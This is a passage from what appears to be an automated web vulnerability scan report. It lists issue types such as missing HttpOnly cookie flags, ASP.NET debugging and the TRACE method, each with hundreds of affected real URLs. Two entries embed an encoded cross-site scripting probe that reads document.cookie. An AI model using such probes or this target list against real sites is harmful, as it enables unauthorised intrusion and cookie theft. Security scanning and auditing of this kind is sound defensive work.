12.5. http://www.travelagentcentral.com/favicon.ico

12.6. http://www.we7.com/favicon.ico

12.7. http://a.collective-media.net/adj/cm.rev_lee/

12.8. http://a.tribalfusion.com/displayAd.js

12.9. http://a.tribalfusion.com/j.ad

12.10. http://a.triggit.com/pxcwicm

12.11. http://ad.turn.com/server/pixel.htm

12.12. http://ads.adbrite.com/adserver/vdi/742697

12.13. http://ads.pointroll.com/PortalServe/

12.14. http://ads.specificmedia.com/serve/v=5

12.15. http://afe.specificclick.net/

12.16. http://ak1.abmr.net/is/k.collective-media.net

12.17. http://ak1.abmr.net/is/tag.contextweb.com

12.18. http://ar.voicefive.com/b/wc_beacon.pli

12.19. http://ar.voicefive.com/bmx3/broker.pli

12.20. http://as.casalemedia.com/j

12.21. http://b.scorecardresearch.com/b

12.22. http://b.voicefive.com/b

12.23. http://bh.contextweb.com/bh/rtset

12.24. http://cms.quantserve.com/dpixel

12.25. http://cw-m.d.chango.com/m/cw

12.26. http://d.xp1.ru4.com/activity

12.27. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

12.28. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

12.29. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

12.30. http://h.zedo.com/init/0.20843081758144966/g.gif

12.31. http://h.zedo.com/init/0.7280766281441555/g.gif

12.32. http://i.w55c.net/ping_match.gif

12.33. http://ib.adnxs.com/getuid

12.34. http://ib.adnxs.com/mapuid

12.35. http://ib.adnxs.com/ptj

12.36. http://ib.adnxs.com/pxj

12.37. http://idpix.media6degrees.com/orbserv/hbpix

12.38. http://image2.pubmatic.com/AdServer/Pug

12.39. http://k.collective-media.net/cmadj/cm.rev_lee/

12.40. http://open.ad.yieldmanager.net/a1

12.41. http://pixel.quantserve.com/pixel

12.42. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

12.43. http://pixel.rubiconproject.com/tap.php

12.44. http://r.openx.net/set

12.45. http://r.turn.com/r/bd

12.46. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

12.47. http://rs.gwallet.com/r1/pixel/x420r7209935

12.48. http://servedby.flashtalking.com/imp/3/15881

12.49. http://sync.mathtag.com/sync/img

12.50. http://tag.contextweb.com/TagPublish/getad.aspx

12.51. http://tags.bluekai.com/site/2731

12.52. http://tags.bluekai.com/site/3358

12.53. http://www.3stepads.com/favicon.ico

12.54. http://www.bfcu.org/favicon.ico

12.55. http://www.bigtitcreampie.com/favicon.ico

12.56. http://www.bizsiteservice.com/favicon.ico

12.57. http://www.blackchristianpeoplemeet.com/favicon.ico

12.58. http://www.bloomu.edu/favicon.ico

12.59. http://www.cafe.com/favicon.ico

12.60. http://www.cariboucoffee.com/favicon.ico

12.61. http://www.eatdrinkbetter.com/favicon.ico

12.62. http://www.foodsaver.com/favicon.ico

12.63. http://www.gecu-ep.org/favicon.ico

12.64. http://www.hlj.com/favicon.ico

12.65. http://www.kjct8.com/favicon.ico

12.66. http://www.mailfromftd.com/favicon.ico

12.67. http://www.myeecu.org/favicon.ico

12.68. http://www.northstarmls.com/favicon.ico

12.69. http://www.petsupplies.com/favicon.ico

12.70. http://www.prosolutionpills.com/favicon.ico

12.71. http://www.quiltersclubofamerica.com/favicon.ico

12.72. http://www.superstreetonline.com/favicon.ico

12.73. http://www.twilightersanonymous.com/favicon.ico

12.74. http://www.whitepage.net/favicon.ico

13. Cookie without HttpOnly flag set

13.1. http://tag.admeld.com/match

13.2. http://tag.admeld.com/pixel

13.3. http://www.670kboi.com/favicon.ico

13.4. http://www.aquascapeonline.com/favicon.ico

13.5. http://www.asiorders.com/favicon.ico

13.6. http://www.auristechnology.com/favicon.ico

13.7. http://www.beangroup.com/favicon.ico

13.8. http://www.bikersingle.com/favicon.ico

13.9. http://www.biloxi.ms.us/favicon.ico

13.10. http://www.cariboucoffee.com/favicon.ico

13.11. http://www.carolinarustica.com/favicon.ico

13.12. http://www.cholesterollowered.com/favicon.ico

13.13. http://www.conscallhome.com/favicon.ico

13.14. http://www.costore.com/favicon.ico

13.15. http://www.dedicatedserverdir.com/favicon.ico

13.16. http://www.divorcemag.com/favicon.ico

13.17. http://www.dulcolaxusa.com/favicon.ico

13.18. http://www.durangoherald.com/favicon.ico

13.19. http://www.elmresources.com/favicon.ico

13.20. http://www.endfatigue.com/favicon.ico

13.21. http://www.extrabux.com/favicon.ico

13.22. http://www.freshpreservingstore.com/favicon.ico

13.23. http://www.getfreedental.com/favicon.ico

13.24. http://www.governmentgrants.com/favicon.ico

13.25. http://www.grayline.com/favicon.ico

13.26. http://www.grubhub.com/favicon.ico

13.27. http://www.gtop100.com/favicon.ico

13.28. http://www.hitsyndication.com/favicon.ico

13.29. http://www.hocking.edu/favicon.ico

13.30. http://www.homebasedbusinessmatchingservice.com/favicon.ico

13.31. http://www.howtradestocksonline.com/favicon.ico

13.32. http://www.infowarsshop.com/favicon.ico

13.33. http://www.keytrain.com/favicon.ico

13.34. http://www.mountainwestbank.com/favicon.ico

13.35. http://www.msgcu.org/favicon.ico

13.36. http://www.orschelnfarmhome.com/favicon.ico

13.37. http://www.outsideinfo.com/favicon.ico

13.38. http://www.pages02.net/favicon.ico

13.39. http://www.pages05.net/favicon.ico

13.40. http://www.positivepromotions.com/favicon.ico

13.41. http://www.ricedelman.com/favicon.ico

13.42. http://www.ryans.com/favicon.ico

13.43. http://www.sanfranrecruiter.com/favicon.ico

13.44. http://www.sdstate.edu/favicon.ico

13.45. http://www.setonhill.edu/favicon.ico

13.46. http://www.sharethatboy.com/favicon.ico

13.47. http://www.shawdirect.ca/favicon.ico

13.48. http://www.specialops.org/favicon.ico

13.49. http://www.superiorpowersports.com/favicon.ico

13.50. http://www.swissarmy.com/favicon.ico

13.51. http://www.sylvania.com/favicon.ico

13.52. http://www.tahoedailytribune.com/favicon.ico

13.53. http://www.targetcenter.com/favicon.ico

13.54. http://www.teachingtextbooks.com/favicon.ico

13.55. http://www.tempcredit.com/favicon.ico

13.56. http://www.thelaughtermovie.com/favicon.ico

13.57. http://www.tireteam.com/favicon.ico

13.58. http://www.tradearca.com/favicon.ico

13.59. http://www.trafficstrategies.com/favicon.ico

13.60. http://www.travelagentcentral.com/favicon.ico

13.61. http://www.udisglutenfree.com/favicon.ico

13.62. http://www.unitedfcu.com/favicon.ico

13.63. http://www.usairwayscruises.com/favicon.ico

13.64. http://www.usavacuum.com/favicon.ico

13.65. http://www.usg.com/favicon.ico

13.66. http://www.vc.edu/favicon.ico

13.67. http://www.vermontjoblink.com/favicon.ico

13.68. http://www.we7.com/favicon.ico

13.69. http://www.womensenews.org/favicon.ico

13.70. http://www.wtma.com/favicon.ico

13.71. http://a.collective-media.net/adj/cm.rev_lee/

13.72. http://a.tribalfusion.com/displayAd.js

13.73. http://a.tribalfusion.com/j.ad

13.74. http://a.triggit.com/pxcwicm

13.75. http://ad.turn.com/server/pixel.htm

13.76. http://ad.yieldmanager.com/iframe3

13.77. http://ad.yieldmanager.com/imp

13.78. http://ads.adbrite.com/adserver/vdi/742697

13.79. http://ads.pointroll.com/PortalServe/

13.80. http://ads.specificmedia.com/serve/v=5

13.81. http://afe.specificclick.net/

13.82. http://ak1.abmr.net/is/k.collective-media.net

13.83. http://ak1.abmr.net/is/tag.contextweb.com

13.84. http://ar.voicefive.com/b/wc_beacon.pli

13.85. http://ar.voicefive.com/bmx3/broker.pli

13.86. http://as.casalemedia.com/j

13.87. http://b.scorecardresearch.com/b

13.88. http://b.voicefive.com/b

13.89. http://bh.contextweb.com/bh/rtset

13.90. http://cms.quantserve.com/dpixel

13.91. http://contextweb-match.dotomi.com/

13.92. http://csc.beap.ad.yieldmanager.net/i

13.93. http://cw-m.d.chango.com/m/cw

13.94. http://d.xp1.ru4.com/activity

13.95. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

13.96. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

13.97. http://d7.zedo.com/bar/v16-405/d3/jsc/gl.js

13.98. http://h.zedo.com/init/0.20843081758144966/g.gif

13.99. http://h.zedo.com/init/0.7280766281441555/g.gif

13.100. http://i.w55c.net/ping_match.gif

13.101. http://idpix.media6degrees.com/orbserv/hbpix

13.102. http://image2.pubmatic.com/AdServer/Pug

13.103. http://k.collective-media.net/cmadj/cm.rev_lee/

13.104. http://l.betrad.com/ct/0_0_0_0_179_1228/us/0/1/0/0/0/0/1/242/279/0/pixel.gif

13.105. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

13.106. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s28735217744881

13.107. http://open.ad.yieldmanager.net/a1

13.108. http://pixel.quantserve.com/pixel

13.109. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

13.110. http://pixel.rubiconproject.com/tap.php

13.111. http://r.openx.net/set

13.112. http://r.turn.com/r/bd

13.113. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

13.114. http://rs.gwallet.com/r1/pixel/x420r7209935

13.115. http://servedby.flashtalking.com/imp/3/15881

13.116. http://sync.mathtag.com/sync/img

13.117. http://tag.contextweb.com/TagPublish/getad.aspx

13.118. http://tags.bluekai.com/site/2731

13.119. http://tags.bluekai.com/site/3358

13.120. http://www.3stepads.com/favicon.ico

13.121. http://www.accu-chek.com/favicon.ico

13.122. http://www.aiche.org/favicon.ico

13.123. http://www.aionarmory.com/favicon.ico

13.124. http://www.allentate.com/favicon.ico

13.125. http://www.americaneducationnetwork.com/favicon.ico

13.126. http://www.ashop.com.au/favicon.ico

13.127. http://www.asme.org/favicon.ico

13.128. http://www.ataglance.com/favicon.ico

13.129. http://www.autozonepro.com/favicon.ico

13.130. http://www.awardhq.com/favicon.ico

13.131. http://www.bcbsga.com/favicon.ico

13.132. http://www.bfcu.org/favicon.ico

13.133. http://www.bhgrealestate.com/favicon.ico

13.134. http://www.bigtitcreampie.com/favicon.ico

13.135. http://www.bloomu.edu/favicon.ico

13.136. http://www.bucknell.edu/favicon.ico

13.137. http://www.buymebeauty.com/favicon.ico

13.138. http://www.bvonstyle.com/favicon.ico

13.139. http://www.cafe.com/favicon.ico

13.140. http://www.cbmove.com/favicon.ico

13.141. http://www.charter-business.com/favicon.ico

13.142. http://www.chefuniforms.com/favicon.ico

13.143. http://www.cityofheroes.com/favicon.ico

13.144. http://www.click-now.net/favicon.ico

13.145. http://www.clickmycredit.com/favicon.ico

13.146. http://www.coloniallife.com/favicon.ico

13.147. http://www.creditacceptance.com/favicon.ico

13.148. http://www.dinnerplates.com/favicon.ico

13.149. http://www.eatdrinkbetter.com/favicon.ico

13.150. http://www.einsurancemarket.com/favicon.ico

13.151. http://www.ej.ru/favicon.ico

13.152. http://www.expressionery.com/favicon.ico

13.153. http://www.eztradein.com/favicon.ico

13.154. http://www.familycorner.com/favicon.ico

13.155. http://www.foodsaver.com/favicon.ico

13.156. http://www.fr.st/favicon.ico

13.157. http://www.france3.fr/favicon.ico

13.158. http://www.freebeerandhotwings.com/favicon.ico

13.159. http://www.freightlinertrucks.com/favicon.ico

13.160. http://www.fujifilmusa.com/favicon.ico

13.161. http://www.gardens.com/favicon.ico

13.162. http://www.gecu-ep.org/favicon.ico

13.163. http://www.getastrology.com/favicon.ico

13.164. http://www.gigamoves.com/favicon.ico

13.165. http://www.girlfriendorgasms.com/favicon.ico

13.166. http://www.gravitydefyer.com/favicon.ico

13.167. http://www.greentreepayday.com/favicon.ico

13.168. http://www.gsmls.com/favicon.ico

13.169. http://www.gwinnettcounty.com/favicon.ico

13.170. http://www.hcr-manorcare.com/favicon.ico

13.171. http://www.hlj.com/favicon.ico

13.172. http://www.humana-military.com/favicon.ico

13.173. http://www.imoutdoorsmedia.com/favicon.ico

13.174. http://www.indthegap.com/favicon.ico

13.175. http://www.ipipeline.com/favicon.ico

13.176. http://www.itsmarta.com/favicon.ico

13.177. http://www.jjc.edu/favicon.ico

13.178. http://www.kjct8.com/favicon.ico

13.179. http://www.ksfcu.org/favicon.ico

13.180. http://www.lacounty.info/favicon.ico

13.181. http://www.lasvegasshows.com/favicon.ico

13.182. http://www.learnatest.com/favicon.ico

13.183. http://www.livingwithout.com/favicon.ico

13.184. http://www.locox.com/favicon.ico

13.185. http://www.mailfromftd.com/favicon.ico

13.186. http://www.make-life-easier.com/favicon.ico

13.187. http://www.mem.com/favicon.ico

13.188. http://www.michie.com/favicon.ico

13.189. http://www.microsofthup.com/favicon.ico

13.190. http://www.monsterjam.com/favicon.ico

13.191. http://www.movieretriever.com/favicon.ico

13.192. http://www.mychasebonus.com/favicon.ico

13.193. http://www.myeecu.org/favicon.ico

13.194. http://www.myleather.com/favicon.ico

13.195. http://www.noisecreep.com/favicon.ico

13.196. http://www.northstarmls.com/favicon.ico

13.197. http://www.nwahomepage.com/favicon.ico

13.198. http://www.occasions365.com/favicon.ico

13.199. http://www.ocfl.net/favicon.ico

13.200. http://www.oilshalegas.com/favicon.ico

13.201. http://www.onedollaremailoffer.com/favicon.ico

13.202. http://www.orderupdate.info/favicon.ico

13.203. http://www.orthohomedefense.com/favicon.ico

13.204. http://www.ovationhair.com/favicon.ico

13.205. http://www.petsupplies.com/favicon.ico

13.206. http://www.photos-naturistes.fr/favicon.ico

13.207. http://www.prosolutionpills.com/favicon.ico

13.208. http://www.prostaff.com/favicon.ico

13.209. http://www.quiltersclubofamerica.com/favicon.ico

13.210. http://www.quotit.net/favicon.ico

13.211. http://www.realestateagentsfinder.com/favicon.ico

13.212. http://www.realhog.com/favicon.ico

13.213. http://www.rlcarriers.com/favicon.ico

13.214. http://www.rotary.org/favicon.ico

13.215. http://www.schneider.com/favicon.ico

13.216. http://www.smartbuyingsite.com/favicon.ico

13.217. http://www.smashbox.com/favicon.ico

13.218. http://www.smccme.edu/favicon.ico

13.219. http://www.songselect.com/favicon.ico

13.220. http://www.specialolympics.org/favicon.ico

13.221. http://www.stjulien.com/favicon.ico

13.222. http://www.sueddeutsche.de/favicon.ico

13.223. http://www.superstreetonline.com/favicon.ico

13.224. http://www.surveymk.com/favicon.ico

13.225. http://www.swiss.com/favicon.ico

13.226. http://www.tapartoche.com/favicon.ico

13.227. http://www.thinkfashion.com/favicon.ico

13.228. http://www.tldm.org/favicon.ico

13.229. http://www.trade-schools.net/favicon.ico

13.230. http://www.tvrepairman.com/favicon.ico

13.231. http://www.twilightersanonymous.com/favicon.ico

13.232. http://www.twoofus.org/favicon.ico

13.233. http://www.upmystreet.com/favicon.ico

13.234. http://www.vitamin-insight.com/favicon.ico

13.235. http://www.webcpa.com/favicon.ico

13.236. http://www.whitepage.net/favicon.ico

13.237. http://www.worldfriends.tv/favicon.ico

13.238. http://www.yadvashem.org/favicon.ico

13.239. http://www.zegeridotc.com/favicon.ico

14. Password field with autocomplete enabled

14.1. http://www.ascp.org/favicon.ico

14.2. http://www.atomiclearning.com/favicon.ico

14.3. http://www.bikersingle.com/favicon.ico

14.4. http://www.conscallhome.com/favicon.ico

14.5. http://www.extrabux.com/favicon.ico

14.6. http://www.restaurantrow.com/favicon.ico

14.7. http://www.voa.org/favicon.ico

14.8. http://www.xcomment.com/favicon.ico

14.9. http://www.xcomment.com/favicon.ico

15. Source code disclosure

16. ASP.NET debugging enabled

16.1. http://www.aaaorid.com/Default.aspx

16.2. http://www.adftrack.com/Default.aspx

16.3. http://www.algebralab.org/Default.aspx

16.4. http://www.baen.com/Default.aspx

16.5. http://www.baskinghill.com/Default.aspx

16.6. http://www.bhgrealestate.com/Default.aspx

16.7. http://www.bookmaker.com/Default.aspx

16.8. http://www.brightonfnl.com/Default.aspx

16.9. http://www.classicsonline.com/Default.aspx

16.10. http://www.coloniallife.com/Default.aspx

16.11. http://www.coxenterprises.com/Default.aspx

16.12. http://www.creditacceptance.com/Default.aspx

16.13. http://www.cupsultana.com/Default.aspx

16.14. http://www.elpasoco.com/Default.aspx

16.15. http://www.embark.com/Default.aspx

16.16. http://www.endlessvacation.com/Default.aspx

16.17. http://www.esc4.net/Default.aspx

16.18. http://www.firstresponse.com/Default.aspx

16.19. http://www.freecampgrounds.com/Default.aspx

16.20. http://www.freeltcquotes.com/Default.aspx

16.21. http://www.freightlinertrucks.com/Default.aspx

16.22. http://www.geniecompany.com/Default.aspx

16.23. http://www.goldenlivingcenters.com/Default.aspx

16.24. http://www.gottashopdeals.com/Default.aspx

16.25. http://www.govcourtregistry.com/Default.aspx

16.26. http://www.justgiving.com/Default.aspx

16.27. http://www.kiwikp.com/Default.aspx

16.28. http://www.kohlerplus.com/Default.aspx

16.29. http://www.landsharklager.com/Default.aspx

16.30. http://www.lunchprepay.com/Default.aspx

16.31. http://www.marioncountyfl.org/Default.aspx

16.32. http://www.maxwebsavings.com/Default.aspx

16.33. http://www.moneymailer.com/Default.aspx

16.34. http://www.moveforfree.com/Default.aspx

16.35. http://www.nccde.org/Default.aspx

16.36. http://www.neatco.com/Default.aspx

16.37. http://www.needlepointers.com/Default.aspx

16.38. http://www.netfit.co.uk/Default.aspx

16.39. http://www.outsideinfo.com/Default.aspx

16.40. http://www.pgcc.edu/Default.aspx

16.41. http://www.picnet.com.au/Default.aspx

16.42. http://www.pnf.com/Default.aspx

16.43. http://www.pnwboces.org/Default.aspx

16.44. http://www.polarispartshouse.com/Default.aspx

16.45. http://www.primos.com/Default.aspx

16.46. http://www.psoriasis.org/Default.aspx

16.47. http://www.realbird.com/Default.aspx

16.48. http://www.ritasice.com/Default.aspx

16.49. http://www.roundtablepizza.com/Default.aspx

16.50. http://www.runreappear.com/Default.aspx

16.51. http://www.sfgotobat.com/Default.aspx

16.52. http://www.smith-county.com/Default.aspx

16.53. http://www.stjohnprovidence.org/Default.aspx

16.54. http://www.suppress003.com/Default.aspx

16.55. http://www.threatexpert.com/Default.aspx

16.56. http://www.tmkrms.com/Default.aspx

16.57. http://www.totalinjury.com/Default.aspx

16.58. http://www.totallymoney.com/Default.aspx

16.59. http://www.trackinhalant.com/Default.aspx

16.60. http://www.tracklilliputian.com/Default.aspx

16.61. http://www.trackphial.com/Default.aspx

16.62. http://www.trackzz.com/Default.aspx

16.63. http://www.trade-schools.net/Default.aspx

16.64. http://www.ureader.de/Default.aspx

16.65. http://www.vanceandhines.com/Default.aspx

16.66. http://www.videogamecareers.com/Default.aspx

16.67. http://www.voa.org/Default.aspx

16.68. http://www.westathome.com/Default.aspx

16.69. http://www.wnyjobs.com/Default.aspx

17. Referer-dependent response

17.1. http://ads.adbrite.com/adserver/vdi/742697

17.2. http://www.facebook.com/plugins/recommendations.php

18. Cross-domain POST

18.1. http://www.crystal-co.com/favicon.ico

18.2. http://www.getastrology.com/favicon.ico

18.3. http://www.specialops.org/favicon.ico

18.4. http://www.voa.org/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8

19.2. http://ad.yieldmanager.com/iframe3

19.3. http://ad.yieldmanager.com/imp

19.4. http://ads.bluelithium.com/st

19.5. http://ads.pointroll.com/PortalServe/

19.6. http://ads.specificmedia.com/serve/v=5

19.7. http://adserv.impactengine.com/www/2r/2o/qq/mo/objembed.html

19.8. http://adserv.impactengine.com/www/5o/b6/6d/fj/objembed.html/@@1303756287@@

19.9. http://adserv.impactengine.com/www/a5/zp/va/fr/objembed.html/@@1299531588@@

19.10. http://adserv.impactengine.com/www/sz/7s/d2/pt/objembed.html/@@1299097540@@

19.11. http://as.casalemedia.com/j

19.12. http://bh.contextweb.com/bh/drts

19.13. http://cm.g.doubleclick.net/pixel

19.14. http://cm.g.doubleclick.net/pixel

19.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

19.16. http://ib.adnxs.com/ptj

19.17. http://open.ad.yieldmanager.net/a1

19.18. http://www.facebook.com/plugins/recommendations.php

19.19. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8

20.2. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

20.3. http://www.2-clicks-stamps.com/favicon.ico

20.4. http://www.610wtvn.com/favicon.ico

20.5. http://www.aiche.org/favicon.ico

20.6. http://www.am570radio.com/favicon.ico

20.7. http://www.atomiclearning.com/favicon.ico

20.8. http://www.boyvipdream.com/favicon.ico

20.9. http://www.brighthorizons.com/favicon.ico

20.10. http://www.buymebeauty.com/favicon.ico

20.11. http://www.bvonstyle.com/favicon.ico

20.12. http://www.callsource.com/favicon.ico

20.13. http://www.cavtel.com/favicon.ico

20.14. http://www.click-now.net/favicon.ico

20.15. http://www.coinmerc.com/favicon.ico

20.16. http://www.conscallhome.com/favicon.ico

20.17. http://www.crystal-co.com/favicon.ico

20.18. http://www.dailyfx.com/favicon.ico

20.19. http://www.deguate.com/favicon.ico

20.20. http://www.donbest.com/favicon.ico

20.21. http://www.edgarsnyder.com/favicon.ico

20.22. http://www.extrabux.com/favicon.ico

20.23. http://www.facebook.com/plugins/recommendations.php

20.24. http://www.fateback.com/favicon.ico

20.25. http://www.findire.com/favicon.ico

20.26. http://www.foodsaver.com/favicon.ico

20.27. http://www.fortunecity.co.uk/favicon.ico

20.28. http://www.getfreedental.com/favicon.ico

20.29. http://www.gizmodefenderstore.com/favicon.ico

20.30. http://www.grayline.com/favicon.ico

20.31. http://www.greatnow.com/favicon.ico

20.32. http://www.gtop100.com/favicon.ico

20.33. http://www.halldata.com/favicon.ico

20.34. http://www.herehard.tv/favicon.ico

20.35. http://www.heresquirt.tv/favicon.ico

20.36. http://www.holdonsecuritysite.com/favicon.ico

20.37. http://www.ipodarcade.com/favicon.ico

20.38. http://www.journalofaccountancy.com/favicon.ico

20.39. http://www.maysville-online.com/content/

20.40. http://www.maysville-online.com/favicon.ico

20.41. http://www.mnnews.com/favicon.ico

20.42. http://www.monsterjam.com/favicon.ico

20.43. http://www.motorracingnetwork.com/favicon.ico

20.44. http://www.mrclean.com/favicon.ico

20.45. http://www.mylovedanal.tv/favicon.ico

20.46. http://www.mylovedasses.tv/favicon.ico

20.47. http://www.mylovedrubber.com/favicon.ico

20.48. http://www.mysubtitles.com/favicon.ico

20.49. http://www.mytoolstore.com/favicon.ico

20.50. http://www.nationnews.com/favicon.ico

20.51. http://www.netfit.co.uk/favicon.ico

20.52. http://www.newholdonsecurity.com/favicon.ico

20.53. http://www.playingforchange.com/favicon.ico

20.54. http://www.prettynylonfeet.com/favicon.ico

20.55. http://www.prosolutionpills.com/favicon.ico

20.56. http://www.rb-hosting.de/favicon.ico

20.57. http://www.restaurantrow.com/favicon.ico

20.58. http://www.ricedelman.com/favicon.ico

20.59. http://www.rv-clubs.us/favicon.ico

20.60. http://www.sanfranrecruiter.com/favicon.ico

20.61. http://www.schoolexpress.com/favicon.ico

20.62. http://www.sharethatboy.com/favicon.ico

20.63. http://www.simplybestcoupons.com/favicon.ico

20.64. http://www.socializr.com/favicon.ico

20.65. http://www.specialops.org/favicon.ico

20.66. http://www.squirt-disgrace.net/favicon.ico

20.67. http://www.stopsacidreflux.com/favicon.ico

20.68. http://www.tahoedailytribune.com/favicon.ico

20.69. http://www.tcoasttalk.com/favicon.ico

20.70. http://www.tempcredit.com/favicon.ico

20.71. http://www.teriskitchen.com/favicon.ico

20.72. http://www.ticketleap.net/favicon.ico

20.73. http://www.tireteam.com/favicon.ico

20.74. http://www.torontolife.com/favicon.ico

20.75. http://www.uwstout.edu/favicon.ico

20.76. http://www.vc.edu/favicon.ico

20.77. http://www.visitsouth.com/favicon.ico

20.78. http://www.vivalagames.com/favicon.ico

20.79. http://www.voa.org/favicon.ico

20.80. http://www.wdasfm.com/favicon.ico

20.81. http://www.wendoverfun.com/favicon.ico

20.82. http://www.womensenews.org/favicon.ico

20.83. http://www.xcomment.com/favicon.ico

21. File upload functionality

22. TRACE method is enabled

22.1. http://ads.specificmedia.com/

22.2. http://bh.contextweb.com/

22.3. http://cache.specificmedia.com/

22.4. http://d.xp1.ru4.com/

22.5. http://domainunion.de/

22.6. http://image2.pubmatic.com/

22.7. http://leeenterprises.112.2o7.net/

22.8. http://pixel.rubiconproject.com/

22.9. http://r.openx.net/

22.10. http://tags.bluekai.com/

22.11. http://www.1-800-volunteer.org/

22.12. http://www.123-reg.co.uk/

22.13. http://www.1280.com/

22.14. http://www.20minutos.es/

22.15. http://www.2benet.net/

22.16. http://www.321gold.com/

22.17. http://www.321search.com/

22.18. http://www.3happybytes.com/

22.19. http://www.3reef.com/

22.20. http://www.48hourcashsystem.com/

22.21. http://www.4m.net/

22.22. http://www.a-russian-girl.com/

22.23. http://www.abbee.com/

22.24. http://www.aboutarc.com/

22.25. http://www.aboutnursing.com/

22.26. http://www.abzolute.net/

22.27. http://www.actionsearch.info/

22.28. http://www.activehire.com/

22.29. http://www.adddev2.com/

22.30. http://www.addgfs.com/

22.31. http://www.adhostingsolutions.com/

22.32. http://www.adnet.de/

22.33. http://www.aerotrader.com/

22.34. http://www.afciviliancareers.com/

22.35. http://www.afibstroke.com/

22.36. http://www.agathachristie.com/

22.37. http://www.agingeye.net/

22.38. http://www.agonist.org/

22.39. http://www.aipbjobs.com/

22.40. http://www.airgunsofarizona.com/

22.41. http://www.albireo.ch/

22.42. http://www.allbran.com/

22.43. http://www.allegiance.com/

22.44. http://www.alltrails.com/

22.45. http://www.alltribes.com/

22.46. http://www.altermedia.info/

22.47. http://www.amasci.com/

22.48. http://www.amateurclipz.com/

22.49. http://www.americandiscountcruises.com/

22.50. http://www.aminus3.com/

22.51. http://www.ancestralfindings.com/

22.52. http://www.anonymousspace.com/

22.53. http://www.antiquecar.com/

22.54. http://www.applianceguru.com/

22.55. http://www.appointmentquest.com/

22.56. http://www.aqua-teens.com/

22.57. http://www.aquabid.com/

22.58. http://www.armpitpicture.com/

22.59. http://www.artbusiness.com/

22.60. http://www.aryion.com/

22.61. http://www.asb.tv/

22.62. http://www.ashmax.com/

22.63. http://www.asianage.com/

22.64. http://www.asianmovielola.com/

22.65. http://www.askdocweb.com/

22.66. http://www.askdramy.com/

22.67. http://www.astridsangelcash.com/

22.68. http://www.authentic-campaigner.com/

22.69. http://www.avidpromedical.com/

22.70. http://www.awssettlement.com/

22.71. http://www.b92.net/

22.72. http://www.babynamescountry.com/

22.73. http://www.babynamespedia.com/

22.74. http://www.bagsnob.com/

22.75. http://www.bakersfieldcollege.edu/

22.76. http://www.bbing.org/

22.77. http://www.bbspot.com/

22.78. http://www.beangroup.com/

22.79. http://www.beautifulkiss.com/

22.80. http://www.bebelsecurity26.com/

22.81. http://www.belcan.com/

22.82. http://www.beloblog.com/

22.83. http://www.belowtopsecret.com/

22.84. http://www.bestfastresult.com/

22.85. http://www.bestwesternmichigan.com/

22.86. http://www.bibleatlas.org/

22.87. http://www.bigagnes.com/

22.88. http://www.bigbrilliant.com/

22.89. http://www.bigtitcreampie.com/

22.90. http://www.blackpast.org/

22.91. http://www.bloomsburgfair.com/

22.92. http://www.blueprintaffiliates.com/

22.93. http://www.bluesforpeace.com/

22.94. http://www.boardingschoolreview.com/

22.95. http://www.bobmovs.com/

22.96. http://www.boomboomflicks.com/

22.97. http://www.boyextra.com/

22.98. http://www.boymale.net/

22.99. http://www.boyvipdream.com/

22.100. http://www.braba.com/

22.101. http://www.branditz.com/

22.102. http://www.brazilianbikinishop.com/

22.103. http://www.breastfeeding.com/

22.104. http://www.broadbandinfo.com/

22.105. http://www.broadbandsports.com/

22.106. http://www.brostoons.com/

22.107. http://www.brusselsjournal.com/

22.108. http://www.brutalkingdom.com/

22.109. http://www.bvonstyle.com/

22.110. http://www.cabinetparts.com/

22.111. http://www.cabinsusa.com/

22.112. http://www.californiasciencecenter.org/

22.113. http://www.callsource.com/

22.114. http://www.cancure.org/

22.115. http://www.caraddict4addicts.com/

22.116. http://www.cardschat.com/

22.117. http://www.carolinanavy.com/

22.118. http://www.carports.com/

22.119. http://www.carsandinsurance.com/

22.120. http://www.cartoonplus.net/

22.121. http://www.cartoonterritory.com/

22.122. http://www.cash-advances-in-1-hour.com/

22.123. http://www.cash-program.com/

22.124. http://www.catxoxo.com/

22.125. http://www.cavtel.com/

22.126. http://www.cayenne.com/

22.127. http://www.cbtagclouds.com/

22.128. http://www.ccsdschools.com/

22.129. http://www.celebsauce.com/

22.130. http://www.census-online.us/

22.131. http://www.channelseca.com/

22.132. http://www.cheatoogle.com/

22.133. http://www.childdevelopmentinfo.com/

22.134. http://www.christusrex.org/

22.135. http://www.cieaura.com/

22.136. http://www.circumstitions.com/

22.137. http://www.cirruscasino.net/

22.138. http://www.citydeals.com/

22.139. http://www.cixos.com/

22.140. http://www.clairesslaves.com/

22.141. http://www.cleanjoke.com/

22.142. http://www.clevelandcountyschools.org/

22.143. http://www.clevelandgolf.com/

22.144. http://www.click-now.net/

22.145. http://www.collectibledetective.com/

22.146. http://www.collegeotr.com/

22.147. http://www.coloring-page.com/

22.148. http://www.coloringcastle.com/

22.149. http://www.com-sub.biz/

22.150. http://www.commerceinsurance.com/

22.151. http://www.concreteexchange.com/

22.152. http://www.consumertipsonline.net/

22.153. http://www.contextads.net/

22.154. http://www.coolsearchtoday.com/

22.155. http://www.corestandards.org/

